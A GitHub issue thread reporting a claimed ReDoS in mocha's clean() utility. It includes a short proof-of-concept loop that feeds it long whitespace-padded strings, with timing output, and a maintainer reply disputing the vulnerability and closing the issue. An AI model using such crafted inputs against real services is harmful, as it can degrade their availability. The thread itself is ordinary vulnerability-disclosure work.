### ISSUE TITLE
ReDoS

### ISSUE THREAD

**Issue by ready-research** [mochajs/mocha#4766]
### Prerequisites

- [x] Checked that your issue hasn't already been filed by cross-referencing [issues with the `faq` label](https://github.com/mochajs/mocha/issues?utf8=%E2%9C%93&q=is%3Aissue%20label%3Afaq%20)
- [x] Checked next-gen ES issues and syntax problems by using the same environment and/or transpiler configuration without Mocha to ensure it isn't just a feature that actually isn't supported in the environment in question or a bug in your code.
- [x] 'Smoke tested' the code to be tested by running it outside the real test suite to get a better sense of whether the problem is in the code under test, your usage of Mocha, or Mocha itself
- [x] Ensured that there is no discrepancy between the locally and globally installed versions of Mocha. You can find them with: `node node_modules/.bin/mocha --version`(Local) and `mocha --version`(Global). We recommend that you _not_ install Mocha globally.

### Description

The `mocha` package is vulnerable to Regular expression Denial of Service (ReDoS) via `clean()`.

### Steps to Reproduce

```
import {clean} from "mocha/lib/utils.js"

for(var i = 1; i <= 50; i++) {
        var time = Date.now();
        var payload = "function"+" ".repeat(i*10000)+"ready-research"
        clean(payload)
        var time_cost = Date.now() - time;
        console.log("Payload length : " + payload.length + ": " + time_cost+" ms");
        }
```

**Expected behavior:** 
clean() should clean the string in a short time.

**Actual behavior:** 
clean() functionality taking more time to clean the input string
```
Payload length : 10009: 168 ms
Payload length : 20009: 500 ms
Payload length : 30009: 1075 ms
--
```
**Reproduces how often:** 
100%

### Versions

- The output of `mocha --version` and `node node_modules/.bin/mocha --version`:
- The output of `node --version`:
- Your operating system
  - name and version:
  - architecture (32 or 64-bit):
- Your shell (e.g., bash, zsh, PowerShell, cmd):
- Your browser and version (if running browser tests):
- Any third-party Mocha-related modules (and their versions):
- Any code transpiler (e.g., TypeScript, CoffeeScript, Babel) being used (and its version):

**Comment by juergba** [comment]
@ready-research I see the `regex`, but I don't agree on the Denial of Service vulnerability.
Thank you, closing.
